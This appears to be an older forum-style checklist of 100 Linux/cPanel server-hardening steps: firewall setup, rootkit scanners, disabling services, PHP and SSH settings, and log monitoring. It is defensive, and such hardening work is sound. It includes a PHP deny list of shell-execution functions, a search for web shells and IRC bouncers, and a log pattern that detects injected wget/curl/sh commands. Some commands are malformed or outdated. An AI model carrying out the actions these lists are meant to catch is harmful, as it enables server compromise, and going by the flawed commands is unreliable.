100 tweaks to secure your server to prevent HACK attempt
How to Secure your Linux Server:1. Kernel recompile with GR security
2. firewall = CSF
3. Stop unnecessary processes
4. Install Logcheck
5. Install Logwatch
You can Optimize host.conf and sysctl.conf
http://www.eth0.us/node/104
To modify LogWatch, SSH into server and login as root
At command prompt type:
nano -w /etc/log.d/conf/logwatch.conf
You will see this entry:
MailTo = root
and change to
Mailto = your@email.com
Note: Set the e-mail address to an offsite account incase you get hacked.
Detail = Low
Change that to Medium, or High...
Detail = 5 or Detail = 10
Note: High will give you more detailed logs with all actions. Save and exit.
6. If cpanel server then WHM configuration check
7. OpenSSH configuration check
8. Switch from proftpd to pure-ftpd ( recommended pure-ftpd as it is more secure one)
9. Rootkit Hunter
rkhunter:
1. Login to your server via SSH as root. Then Type:
[root@server ~]cd /usr/local/src/
Download RKHunter Version 1.1.4
[root@server ~]wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz
Extract files
[root@server ~]tar -xzvf rkhunter-1.1.4.tar.gz
[root@server ~]cd rkhunter
[root@server ~]./installer.sh
2. Now setup RKHunter to e-mail you you daily scan reports:
[root@server ~]nano -w /etc/cron.daily/rkhunter.sh
Add The Following:
1. !/bin/bash
(/usr/local/bin/rkhunter -c --cronjob 2>&1 | mail -s "RKhunter Scan Details" replace-this@with-your-email.com)
Replace the e-mail above with your e-mail.
It is best to send the e-mail to an e-mail off-site so that
if the box IS compromised the hacker can't erase the scan report unless he hacks another server too
# chmod +x /etc/cron.daily/rkhunter.sh
10. Chkrootkit
Installing chkrootkit
[root@server ~]# wget >>ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
[root@server ~]# tar xvfz chkrootkit.tar.gz
[root@server ~]# ./chkrootkit*/chkrootkit
11. mod_security
12. mod_evasive
13. Host spoof protection
14. Operating System check
15. Name server configuration check
16. Disk check
17. Kernel check
18. Apache tune and check
19. MySQL tune and check
20. Enhanced log rotation
21. Day of the week backup rotations
22. Secure /tmp /var/tmp /dev/shm
23. Libsafe for 2.4 kernels
24. Exploit check
25. Delete unnecessary OS users
26. Disable open DNS recursion
27. Enhanced path protection
28. Remove SUID/GUID from binaries
29. PHP hardening
30. phpsuexec
31. Disable vulnerable phpBB installs
32. Initial cPanel configuration
33. Check iptables is configured
34. Check incoming MySQL port
35. Check /etc/cron.daily/logrotate
36. Check /etc/resolv.conf for localhost entry
37. Check /etc/named.conf for recursion restrictions
38. Check server runlevel
39. Check nobody cron
40. Check Operating System support
41. Check SSHv1 is disabled
42. Check SSH on non-standard port
43. Check SSH PasswordAuthentication
44. Check telnet port 23 is not in use
45. Check shell limits
46. Check Background Process Killer
47. Check root forwarder
48. Check exim for extended logging
49. Check php for enable_dl = enable_dl = Off
50. Check php for disable_functions=
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen
51. Check php for register_globals register_globals = Off
52. Check php open_basedir protection
53. Check phpsuexec
54. Check cPanel login is SSL only
55. Check boxtrapper is disabled
56. Check max emails per hour is set
57. Check whether users can reset passwords via email
58. Check whether native cPanel SSL is enabled
59. Check compilers
60. Check Anonymous FTP access
61. Check allow remote domains
62. Check block common domains
63. Check allow park domains
64. Check package updates
65. Check security updates
66. Check melange chat server
67. service cups stop; chkconfig cups off
68. service xfs stop; chkconfig xfs off
69. service atd stop; chkconfig atd off
70. service nfslock stop; chkconfig nfslock off
71. service canna stop; chkconfig canna off
72. service FreeWnn stop; chkconfig FreeWnn off
73. service cups-config-daemon stop; chkconfig cups-config-daemon off
74. service iiim stop; chkconfig iiim off
75. service mDNSResponder stop; chkconfig mDNSResponder off
76. service nifd stop; chkconfig nifd off
77. service rpcidmapd stop; chkconfig rpcidmapd off
78. service bluetooth stop; chkconfig bluetooth off
79. service anacron stop; chkconfig anacron off
80. service gpm stop; chkconfig gpm off
81. service saslauthd stop; chkconfig saslauthd off
82. service avahi-daemon stop; chkconfig avahi-daemon off
83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off
84. service hidd stop; chkconfig hidd off
85. service pcscd stop; chkconfig pcscd off
86. service sbadm stop; chkconfig sbadm off
87. service webmin stop; chkconfig webmin off
88. Add Load Alert Scripts with 1 min cron
#!/bin/bash
#uptime alerti script ..
UP=`uptime|awk '{print $(NF-2)}'|cut -d. -f1`
if test $UP -gt 4
then
`uptime| mail -s "**SERVER LOAD is $UP" mailadd@mail.com`
fi
89. ignore ping :
1.[root@server ~] iptables -A INPUT -p icmp -j DROP
[root@server ~] echo 1>/proc/sys/net/ipv4/icmp_echo_ignore_all
[root@server ~] vi /etc/sysctl.conf
Append following line:
net.ipv4.icmp_echo_ignore_all = 1
90. Find directory with 777 permission.
[root@server ~] find . -type d -perm 777
91.Check for open ports using nmap command.
92. Disable identification output for Apache
To disable the version output for proftp, SSH into server and login as root.
At command prompt type: pico /etc/httpd/conf/httpd.conf
Scroll (way) down and change the following line to
ServerSignature Off
Restart Apache
At command prompt type:
[root@server ~] /etc/rc.d/init.d/httpd restart
93.Change ssh ListenAddress /etc/ssh/sshd_config
94.PermitRootLogin no
95.Add root login alert
vi .bash_profile
echo 'ALERT - Root Shell Access on:' `date` `who`
| mail -s "Alert: Root Access from `who | awk '{print $6}'`" your@email.com
96.Set an SSH Legal Message in /etc/motd
97.Locate.
locate shell.php
locate irc
locate eggdrop
locate bnc
locate BNC
locate ptlink
locate BitchX
locate guardservices
locate psyBNC
locate .rhosts
98.Perform some udp and tcp scan here :
http://www.hackerwatch.org/probe
Also to check if Your Internet connection has no Reverse DNS, this one is also a good URL to check out:
https://www.grc.com/x/ne.dll?bh0bkyd2
99.Check log files at
[root@server ~] tail -f /var/log/secure
[root@server ~] tail -f /var/log/messages
[root@server ~] tail -f /var/log/lastlog ( to check last log)
[root@server ~] tail -f /var/log/security ( logs related to kernel and ICMP/ TCP)
and other log files ( depending on your OS distro) of services running to see if there are any issues.
vmstat
Displays information about memory, cpu and disk.
Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)
mpstat
Displays statistics about cpu utilization. This will help us to see if your cpu is over worked or not.
Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)
iostat
This command displays statistics about the disk system.
Useful options:
-d - Gives the device utilization report.
-k - Display statistics in kilobytes per second.
Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)
sar
Displays overall system performance.
Check to see if your server has any hidden processes running.
ps
Displays the status of all known processes.
lsof
100. Now List all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command.
[root@server ~]chmod -R 700 /etc/rc.d/init.d/*
Use rpm -Va to find out if an rpm is modified
* Apply security patches to vulnerable software (ie. patch -p1 < patch file)
* Remove all unneeded ttys and console logins by removing the entry from /etc/securetty
* Check system logs (eg: /var/log/messages, /var/log/secure, etc.)
* Set a password on the boot loader (lilo and grub both support this)
* Monitor the system (nagios or big brother)
Install AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire.
http://www.cs.tut.fi/~rammer/aide.html
Testing phase when in production:
Use tools like nessus, nikto, and nmap to do a penetration test and see how well your server is secured.
Also do a stress test.
[root@server ~] find /usr/local/apache/domlogs -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;
[root@server ~] find /usr/local/apache/domlogs -exec grep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;
Note: egrep works for For FreeBSD and for other distro's like CentOS use grep.